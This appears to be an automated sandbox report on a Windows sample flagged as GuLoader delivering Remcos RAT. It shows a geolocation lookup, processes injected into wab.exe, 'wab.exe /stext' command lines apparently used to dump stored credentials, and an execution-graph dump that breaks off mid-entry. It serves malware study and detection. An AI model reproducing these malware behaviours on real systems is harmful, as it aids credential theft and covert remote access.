                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.900979042 CEST530OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                        Host: geoplugin.net
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.230171919 CEST537INHTTP/1.1 200 OK
                                                                                                                                                                                                                        date: Fri, 20 Oct 2023 15:44:16 GMT
                                                                                                                                                                                                                        server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                        content-length: 973
                                                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                                                        cache-control: public, max-age=300
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 35 2e 33 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 6f 73 20 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 43 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 38 30 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 34 2e 30 35 34 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 31 31 38 2e 32 34 34 31 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                                                                                                                        Data Ascii: { "geoplugin_request":"102.129.145.32", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Los Angeles", "geoplugin_region":"California", "geoplugin_regionCode":"CA", "geoplugin_regionName":"California", "geoplugin_areaCode":"", "geoplugin_dmaCode":"803", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0544", "geoplugin_longitude":"-118.2441", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:17:43:52
                                                                                                                                                                                                                        Start date:20/10/2023
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:2'716'872 bytes
                                                                                                                                                                                                                        MD5 hash:AA9C44EDA9AF9222C5CAB2466BC44F5A
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000005.00000002.26296210823.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.26296961645.0000000002CA8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                        Start time:17:43:59
                                                                                                                                                                                                                        Start date:20/10/2023
                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
                                                                                                                                                                                                                        Imagebase:0xf10000
                                                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                        Start time:17:44:16
                                                                                                                                                                                                                        Start date:20/10/2023
                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ghwqzgqbog
                                                                                                                                                                                                                        Imagebase:0xf10000
                                                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                        Start time:17:44:16
                                                                                                                                                                                                                        Start date:20/10/2023
                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ghwqzgqbog
                                                                                                                                                                                                                        Imagebase:0xf10000
                                                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                        Start time:17:44:16
                                                                                                                                                                                                                        Start date:20/10/2023
                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ijcjazbdkoecd
                                                                                                                                                                                                                        Imagebase:0xf10000
                                                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                        Start time:17:44:16
                                                                                                                                                                                                                        Start date:20/10/2023
                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tehbtruwywwhnexk
                                                                                                                                                                                                                        Imagebase:0xf10000
                                                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:20.6%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:13.8%
                                                                                                                                                                                                                          Signature Coverage:20.3%
                                                                                                                                                                                                                          Total number of Nodes:1524
                                                                                                                                                                                                                          Total number of Limit Nodes:47
                                                                                                                                                                                                                          execution_graph 4806 10001000 4809 1000101b 4806->4809 4810 10001516 GlobalFree 4809->4810 4811 10001020 4810->4811 4812 10001024 4811->4812 4813 10001027 GlobalAlloc 4811->4813 4814 1000153d 3 API calls 4812->4814 4813->4812 4815 10001019 4814->4815 4816 402840 4817 402bbf 18 API calls 4816->4817 4819 40284e 4817->4819 4818 402864 4821 405c00 2 API calls 4818->4821 4819->4818 4820 402bbf 18 API calls 4819->4820 4820->4818 4822 40286a 4821->4822 4844 405c25 GetFileAttributesW CreateFileW 4822->4844 4824 402877 4825 402883 GlobalAlloc 4824->4825 4826 40291a 4824->4826 4827 402911 CloseHandle 4825->4827 4828 40289c 4825->4828 4829 402922 DeleteFileW 4826->4829 4830 402935 4826->4830 4827->4826 4845 403258 SetFilePointer 4828->4845 4829->4830 4832 4028a2 4833 403242 ReadFile 4832->4833 4834 4028ab GlobalAlloc 4833->4834 4835 4028bb 4834->4835 4836 4028ef 4834->4836 4837 403027 32 API calls 4835->4837 4838 405cd7 WriteFile 4836->4838 4843 4028c8 4837->4843 4839 4028fb GlobalFree 4838->4839 4840 403027 32 API calls 4839->4840 4841 40290e 4840->4841 4841->4827 4842 4028e6 GlobalFree 4842->4836 4843->4842 4844->4824 4845->4832 4846 401cc0 4847 402ba2 18 API calls 4846->4847 4848 401cc7 4847->4848 4849 402ba2 18 API calls 4848->4849 4850 401ccf GetDlgItem 4849->4850 4851 402531 4850->4851 4852 4029c0 4853 402ba2 18 API calls 4852->4853 4854 4029c6 4853->4854 4855 4029d4 4854->4855 4856 4029f9 4854->4856 4858 40281e 4854->4858 4855->4858 4860 405f97 wsprintfW 4855->4860 4857 406072 18 API calls 4856->4857 4856->4858 4857->4858 4860->4858 4225 401fc3 4226 401fd5 4225->4226 4227 402087 4225->4227 4248 402bbf 4226->4248 4229 401423 25 API calls 4227->4229 4236 4021e1 4229->4236 4231 402bbf 18 API calls 4232 401fe5 4231->4232 4233 401ffb LoadLibraryExW 4232->4233 4234 401fed GetModuleHandleW 4232->4234 4233->4227 4235 40200c 4233->4235 4234->4233 4234->4235 4254 406499 WideCharToMultiByte 4235->4254 4239 402056 4241 4051af 25 API calls 4239->4241 4240 40201d 4242 402025 4240->4242 4243 40203c 4240->4243 4244 40202d 4241->4244 4298 401423 4242->4298 4257 10001759 CloseHandle 4243->4257 4244->4236 4246 402079 FreeLibrary 4244->4246 4246->4236 4249 402bcb 4248->4249 4250 406072 18 API calls 4249->4250 4251 402bec 4250->4251 4252 401fdc 4251->4252 4253 4062e4 5 API calls 4251->4253 4252->4231 4253->4252 4255 4064c3 GetProcAddress 4254->4255 4256 402017 4254->4256 4255->4256 4256->4239 4256->4240 4301 10001b18 4257->4301 4259 10001790 4260 100018a6 4259->4260 4261 100017a1 4259->4261 4262 100017a8 4259->4262 4260->4244 4350 10002286 4261->4350 4333 100022d0 4262->4333 4267 1000180c 4271 10001812 4267->4271 4272 1000184e 4267->4272 4268 100017ee 4363 100024a9 4268->4363 4269 100017d7 4281 100017cd 4269->4281 4360 10002b5f 4269->4360 4270 100017be 4274 100017c4 4270->4274 4280 100017cf 4270->4280 4276 100015b4 3 API calls 4271->4276 4278 100024a9 10 API calls 4272->4278 4274->4281 4344 100028a4 4274->4344 4283 10001828 4276->4283 4284 10001840 4278->4284 4279 100017f4 4374 100015b4 4279->4374 4354 10002645 4280->4354 4281->4267 4281->4268 4287 100024a9 10 API calls 4283->4287 4290 10001895 4284->4290 4385 1000246c 4284->4385 4286 100017d5 4286->4281 4287->4284 4290->4260 4292 1000189f GlobalFree 4290->4292 4292->4260 4295 10001881 4295->4290 4389 1000153d wsprintfW 4295->4389 4296 1000187a FreeLibrary 4296->4295 4299 4051af 25 API calls 4298->4299 4300 401431 4299->4300 4300->4244 4392 1000121b GlobalAlloc 4301->4392 4303 10001b3c 4393 1000121b GlobalAlloc 4303->4393 4305 10001d7a GlobalFree GlobalFree GlobalFree 4306 10001d97 4305->4306 4323 10001de1 4305->4323 4307 100020ee 4306->4307 4316 10001dac 4306->4316 4306->4323 4309 10002110 GetModuleHandleW 4307->4309 4307->4323 4308 10001c1d GlobalAlloc 4326 10001b47 4308->4326 4311 10002121 LoadLibraryW 4309->4311 4312 10002136 4309->4312 4310 10001c86 GlobalFree 4310->4326 4311->4312 4311->4323 4400 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4312->4400 4313 10001c68 lstrcpyW 4314 10001c72 lstrcpyW 4313->4314 4314->4326 4316->4323 4396 1000122c 4316->4396 4317 10002048 4317->4323 4327 10002090 lstrcpyW 4317->4327 4318 10002188 4319 10002195 lstrlenW 4318->4319 4318->4323 4401 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4319->4401 4323->4259 4324 10002148 4324->4318 4332 10002172 GetProcAddress 4324->4332 4325 100021af 4325->4323 4326->4305 4326->4308 4326->4310 4326->4313 4326->4314 4326->4317 4326->4323 4328 10001cc4 4326->4328 4329 10001f37 GlobalFree 4326->4329 4331 1000122c 2 API calls 4326->4331 4399 1000121b GlobalAlloc 4326->4399 4327->4323 4328->4326 4394 1000158f GlobalSize GlobalAlloc 4328->4394 4329->4326 4331->4326 4332->4318 4340 100022e8 4333->4340 4335 10002415 GlobalFree 4339 100017ae 4335->4339 4335->4340 4336 100023d3 lstrlenW 4336->4335 4343 100023de 4336->4343 4337 100023ba GlobalAlloc CLSIDFromString 4337->4335 4338 1000238f GlobalAlloc WideCharToMultiByte 4338->4335 4339->4269 4339->4270 4339->4281 4340->4335 4340->4336 4340->4337 4340->4338 4341 1000122c GlobalAlloc lstrcpynW 4340->4341 4403 100012ba 4340->4403 4341->4340 4343->4335 4407 100025d9 4343->4407 4346 100028b6 4344->4346 4345 1000295b CreateFileA 4347 10002979 4345->4347 4346->4345 4348 10002a75 4347->4348 4349 10002a6a GetLastError 4347->4349 4348->4281 4349->4348 4351 100017a7 4350->4351 4352 10002296 4350->4352 4351->4262 4352->4351 4353 100022a8 GlobalAlloc 4352->4353 4353->4352 4358 10002661 4354->4358 4355 100026b2 GlobalAlloc 4359 100026d4 4355->4359 4356 100026c5 4357 100026ca GlobalSize 4356->4357 4356->4359 4357->4359 4358->4355 4358->4356 4359->4286 4361 10002b6a 4360->4361 4362 10002baa GlobalFree 4361->4362 4410 1000121b GlobalAlloc 4363->4410 4365 10002530 StringFromGUID2 4371 100024b3 4365->4371 4366 10002541 lstrcpynW 4366->4371 4367 1000250b MultiByteToWideChar 4367->4371 4368 10002554 wsprintfW 4368->4371 4369 10002571 GlobalFree 4369->4371 4370 100025ac GlobalFree 4370->4279 4371->4365 4371->4366 4371->4367 4371->4368 4371->4369 4371->4370 4372 10001272 2 API calls 4371->4372 4411 100012e1 4371->4411 4372->4371 4415 1000121b GlobalAlloc 4374->4415 4376 100015ba 4377 100015c7 lstrcpyW 4376->4377 4379 100015e1 4376->4379 4380 100015fb 4377->4380 4379->4380 4381 100015e6 wsprintfW 4379->4381 4382 10001272 4380->4382 4381->4380 4383 100012b5 GlobalFree 4382->4383 4384 1000127b GlobalAlloc lstrcpynW 4382->4384 4383->4284 4384->4383 4386 10001861 4385->4386 4387 1000247a 4385->4387 4386->4295 4386->4296 4387->4386 4388 10002496 GlobalFree 4387->4388 4388->4387 4390 10001272 2 API calls 4389->4390 4391 1000155e 4390->4391 4391->4290 4392->4303 4393->4326 4395 100015ad 4394->4395 4395->4328 4402 1000121b GlobalAlloc 4396->4402 4398 1000123b lstrcpynW 4398->4323 4399->4326 4400->4324 4401->4325 4402->4398 4404 100012c1 4403->4404 4405 1000122c 2 API calls 4404->4405 4406 100012df 4405->4406 4406->4340 4408 100025e7 VirtualAlloc 4407->4408 4409 1000263d 4407->4409 4408->4409 4409->4343 4410->4371 4412 100012ea 4411->4412 4413 1000130c 4411->4413 4412->4413 4414 100012f0 lstrcpyW 4412->4414 4413->4371 4414->4413 4415->4376 4861 4016c4 4862 402bbf 18 API calls 4861->4862 4863 4016ca GetFullPathNameW 4862->4863 4864 4016e4 4863->4864 4865 401706 4863->4865 4864->4865 4868 406393 2 API calls 4864->4868 4866 40171b GetShortPathNameW 4865->4866 4867 402a4c 4865->4867 4866->4867 4869 4016f6 4868->4869 4869->4865 4871 406050 lstrcpynW 4869->4871 4871->4865 4872 4014cb 4873 4051af 25 API calls 4872->4873 4874 4014d2 4873->4874 4875 40194e 4876 402bbf 18 API calls 4875->4876 4877 401955 lstrlenW 4876->4877 4878 402531 4877->4878 4879 4027ce 4880 4027d6 4879->4880 4881 4027da FindNextFileW 4880->4881 4884 4027ec 4880->4884 4882 402833 4881->4882 4881->4884 4885 406050 lstrcpynW 4882->4885 4885->4884 4629 401754 4630 402bbf 18 API calls 4629->4630 4631 40175b 4630->4631 4632 405c54 2 API calls 4631->4632 4633 401762 4632->4633 4634 405c54 2 API calls 4633->4634 4634->4633 4886 401d56 GetDC GetDeviceCaps 4887 402ba2 18 API calls 4886->4887 4888 401d74 MulDiv ReleaseDC 4887->4888 4889 402ba2 18 API calls 4888->4889 4890 401d93 4889->4890 4891 406072 18 API calls 4890->4891 4892 401dcc CreateFontIndirectW 4891->4892 4893 402531 4892->4893 4894 401a57 4895 402ba2 18 API calls 4894->4895 4896 401a5d 4895->4896 4897 402ba2 18 API calls 4896->4897 4898 401a05 4897->4898 4899 403857 4900 403862 4899->4900 4901 403869 GlobalAlloc 4900->4901 4902 403866 4900->4902 4901->4902 4903 4014d7 4904 402ba2 18 API calls 4903->4904 4905 4014dd Sleep 4904->4905 4907 402a4c 4905->4907 4908 40155b 4909 4029f2 4908->4909 4912 405f97 wsprintfW 4909->4912 4911 4029f7 4912->4911 4913 401ddc 4914 402ba2 18 API calls 4913->4914 4915 401de2 4914->4915 4916 402ba2 18 API calls 4915->4916 4917 401deb 4916->4917 4918 401df2 ShowWindow 4917->4918 4919 401dfd EnableWindow 4917->4919 4920 402a4c 4918->4920 4919->4920 4921 4022df 4922 402bbf 18 API calls 4921->4922 4923 4022ee 4922->4923 4924 402bbf 18 API calls 4923->4924 4925 4022f7 4924->4925 4926 402bbf 18 API calls 4925->4926 4927 402301 GetPrivateProfileStringW 4926->4927 4928 401bdf 4929 402ba2 18 API calls 4928->4929 4930 401be6 4929->4930 4931 402ba2 18 API calls 4930->4931 4933 401bf0 4931->4933 4932 401c00 4935 401c10 4932->4935 4936 402bbf 18 API calls 4932->4936 4933->4932 4934 402bbf 18 API calls 4933->4934 4934->4932 4937 401c1b 4935->4937 4938 401c5f 4935->4938 4936->4935 4939 402ba2 18 API calls 4937->4939 4940 402bbf 18 API calls 4938->4940 4942 401c20 4939->4942 4941 401c64 4940->4941 4943 402bbf 18 API calls 4941->4943 4944 402ba2 18 API calls 4942->4944 4945 401c6d FindWindowExW 4943->4945 4946 401c29 4944->4946 4949 401c8f 4945->4949 4947 401c31 SendMessageTimeoutW 4946->4947 4948 401c4f SendMessageW 4946->4948 4947->4949 4948->4949 4950 401960 4951 402ba2 18 API calls 4950->4951 4952 401967 4951->4952 4953 402ba2 18 API calls 4952->4953 4954 401971 4953->4954 4955 402bbf 18 API calls 4954->4955 4956 40197a 4955->4956 4957 40198e lstrlenW 4956->4957 4958 4019ca 4956->4958 4959 401998 4957->4959 4959->4958 4963 406050 lstrcpynW 4959->4963 4961 4019b3 4961->4958 4962 4019c0 lstrlenW 4961->4962 4962->4958 4963->4961 4964 404262 lstrlenW 4965 404281 4964->4965 4966 404283 WideCharToMultiByte 4964->4966 4965->4966 4967 401662 4968 402bbf 18 API calls 4967->4968 4969 401668 4968->4969 4970 406393 2 API calls 4969->4970 4971 40166e 4970->4971 4972 4019e4 4973 402bbf 18 API calls 4972->4973 4974 4019eb 4973->4974 4975 402bbf 18 API calls 4974->4975 4976 4019f4 4975->4976 4977 4019fb lstrcmpiW 4976->4977 4978 401a0d lstrcmpW 4976->4978 4979 401a01 4977->4979 4978->4979 4447 4025e5 4461 402ba2 4447->4461 4449 40272d 4450 40263a ReadFile 4450->4449 4456 4025f4 4450->4456 4451 4026d3 4451->4449 4451->4456 4464 405d06 SetFilePointer 4451->4464 4452 405ca8 ReadFile 4452->4456 4453 40267a MultiByteToWideChar 4453->4456 4454 40272f 4473 405f97 wsprintfW 4454->4473 4456->4449 4456->4450 4456->4451 4456->4452 4456->4453 4456->4454 4458 4026a0 SetFilePointer MultiByteToWideChar 4456->4458 4459 402740 4456->4459 4458->4456 4459->4449 4460 402761 SetFilePointer 4459->4460 4460->4449 4462 406072 18 API calls 4461->4462 4463 402bb6 4462->4463 4463->4456 4465 405d22 4464->4465 4472 405d3e 4464->4472 4466 405ca8 ReadFile 4465->4466 4467 405d2e 4466->4467 4468 405d47 SetFilePointer 4467->4468 4469 405d6f SetFilePointer 4467->4469 4467->4472 4468->4469 4470 405d52 4468->4470 4469->4472 4471 405cd7 WriteFile 4470->4471 4471->4472 4472->4451 4473->4449 4980 401e66 4981 402bbf 18 API calls 4980->4981 4982 401e6c 4981->4982 4983 4051af 25 API calls 4982->4983 4984 401e76 4983->4984 4985 405730 2 API calls 4984->4985 4986 401e7c 4985->4986 4987 401edb CloseHandle 4986->4987 4988 401e8c WaitForSingleObject 4986->4988 4989 40281e 4986->4989 4987->4989 4990 401e9e 4988->4990 4991 401eb0 GetExitCodeProcess 4990->4991 4992 406466 2 API calls 4990->4992 4993 401ec2 4991->4993 4994 401ecd 4991->4994 4995 401ea5 WaitForSingleObject 4992->4995 4997 405f97 wsprintfW 4993->4997 4994->4987 4995->4990 4997->4994 4483 401767 4484 402bbf 18 API calls 4483->4484 4485 40176e 4484->4485 4486 401796 4485->4486 4487 40178e 4485->4487 4523 406050 lstrcpynW 4486->4523 4522 406050 lstrcpynW 4487->4522 4490 4017a1 4492 405a04 3 API calls 4490->4492 4491 401794 4494 4062e4 5 API calls 4491->4494 4493 4017a7 lstrcatW 4492->4493 4493->4491 4500 4017b3 4494->4500 4495 406393 2 API calls 4495->4500 4497 405c00 2 API calls 4497->4500 4498 4017c5 CompareFileTime 4498->4500 4499 401885 4501 4051af 25 API calls 4499->4501 4500->4495 4500->4497 4500->4498 4500->4499 4503 406050 lstrcpynW 4500->4503 4509 406072 18 API calls 4500->4509 4518 405795 MessageBoxIndirectW 4500->4518 4520 40185c 4500->4520 4521 405c25 GetFileAttributesW CreateFileW 4500->4521 4504 40188f 4501->4504 4502 4051af 25 API calls 4508 401871 4502->4508 4503->4500 4505 403027 32 API calls 4504->4505 4506 4018a2 4505->4506 4507 4018b6 SetFileTime 4506->4507 4510 4018c8 FindCloseChangeNotification 4506->4510 4507->4510 4509->4500 4510->4508 4511 4018d9 4510->4511 4512 4018f1 4511->4512 4513 4018de 4511->4513 4515 406072 18 API calls 4512->4515 4514 406072 18 API calls 4513->4514 4516 4018e6 lstrcatW 4514->4516 4517 4018f9 4515->4517 4516->4517 4519 405795 MessageBoxIndirectW 4517->4519 4518->4500 4519->4508 4520->4502 4520->4508 4521->4500 4522->4491 4523->4490 4998 404568 4999 404578 4998->4999 5000 40459e 4998->5000 5001 404114 19 API calls 4999->5001 5002 40417b 8 API calls 5000->5002 5003 404585 SetDlgItemTextW 5001->5003 5004 4045aa 5002->5004 5003->5000 5005 100018a9 5006 100018cc 5005->5006 5007 100018ff GlobalFree 5006->5007 5008 10001911 5006->5008 5007->5008 5009 10001272 2 API calls 5008->5009 5010 10001a87 GlobalFree GlobalFree 5009->5010 5011 401ee9 5012 402bbf 18 API calls 5011->5012 5013 401ef0 5012->5013 5014 406393 2 API calls 5013->5014 5015 401ef6 5014->5015 5017 401f07 5015->5017 5018 405f97 wsprintfW 5015->5018 5018->5017 5019 4021ea 5020 402bbf 18 API calls 5019->5020 5021 4021f0 5020->5021 5022 402bbf 18 API calls 5021->5022 5023 4021f9 5022->5023 5024 402bbf 18 API calls 5023->5024 5025 402202 5024->5025 5026 406393 2 API calls 5025->5026 5027 40220b 5026->5027 5028 40221c lstrlenW lstrlenW 5027->5028 5029 40220f 5027->5029 5030 4051af 25 API calls 5028->5030 5031 4051af 25 API calls 5029->5031 5033 402217 5029->5033 5032 40225a SHFileOperationW 5030->5032 5031->5033 5032->5029 5032->5033 5034 40156b 5035 401584 5034->5035 5036 40157b ShowWindow 5034->5036 5037 401592 ShowWindow 5035->5037 5038 402a4c 5035->5038 5036->5035 5037->5038 5039 40226e 5040 402275 5039->5040 5043 402288 5039->5043 5041 406072 18 API calls 5040->5041 5042 402282 5041->5042 5044 405795 MessageBoxIndirectW 5042->5044 5044->5043 5045 4052ee 5046 405498 5045->5046 5047 40530f GetDlgItem GetDlgItem GetDlgItem 5045->5047 5049 4054a1 GetDlgItem CreateThread CloseHandle 5046->5049 5050 4054c9 5046->5050 5090 404149 SendMessageW 5047->5090 5049->5050 5052 4054e0 ShowWindow ShowWindow 5050->5052 5053 405519 5050->5053 5054 4054f4 5050->5054 5051 40537f 5059 405386 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5051->5059 5092 404149 SendMessageW 5052->5092 5058 40417b 8 API calls 5053->5058 5055 405554 5054->5055 5056 405508 5054->5056 5057 40552e ShowWindow 5054->5057 5055->5053 5067 405562 SendMessageW 5055->5067 5061 